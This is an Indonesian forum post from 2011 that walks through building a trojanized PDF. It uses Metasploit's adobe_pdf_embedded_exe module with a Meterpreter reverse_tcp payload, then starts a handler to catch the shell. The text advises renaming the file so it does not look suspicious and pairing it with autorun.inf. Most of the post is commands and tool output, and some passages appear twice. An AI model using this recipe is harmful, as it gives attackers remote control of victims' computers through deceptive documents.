09-13-2011, 11:52 PM
mungkin bikin file PDF nya bisa cara lain !!!
jadi akan tercipta gabungan dari file pdf kita tadi yg namanya filePDF.pdf dengan payload exe .. gabungan itu namanya evil.pdf yg ada didirektori /root/.msf4/data/exploits/evil.pdf
tinggal diganti aja namanya sesuai dengan isi dari filePDF.pdf supaya tidak mencurigakan !!
kalo file autorun.inf nya kan ada contohnya diatas !!
klo udah kita tinggal listenning di port sesuai yg ditentukan diatas !!
yuupp mungkin langkah ini bisa jadi alternatif !!
NB : Hanya untuk versi Adobe Reader 9 kebawah !!
Code:
root@RR12:~# msfconsole
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /root/filePDF.pdf
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.88.129
msf exploit(adobe_pdf_embedded_exe) > set LPORT 4444
msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Reading in '/root/filePDF.pdf'...
[*] Parsing '/root/filePDF.pdf'...
[*] Parsing Successful.
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[*] Creating 'evil.pdf' file...
[*] Generated output file [*] Reading in '/root/filePDF.pdf'...
[*] Parsing '/root/filePDF.pdf'...
[*] Parsing Successful.
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[*] Creating 'evil.pdf' file...
[*] Generated output file /root/.msf4/data/exploits/evil.pdf
msf exploit(adobe_pdf_embedded_exe) >
msf exploit(adobe_pdf_embedded_exe) >
jadi akan tercipta gabungan dari file pdf kita tadi yg namanya filePDF.pdf dengan payload exe .. gabungan itu namanya evil.pdf yg ada didirektori /root/.msf4/data/exploits/evil.pdf
tinggal diganti aja namanya sesuai dengan isi dari filePDF.pdf supaya tidak mencurigakan !!
kalo file autorun.inf nya kan ada contohnya diatas !!
klo udah kita tinggal listenning di port sesuai yg ditentukan diatas !!
Code:
root@RR12:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.88.129
msf exploit(handler) > exploit
yuupp mungkin langkah ini bisa jadi alternatif !!
NB : Hanya untuk versi Adobe Reader 9 kebawah !!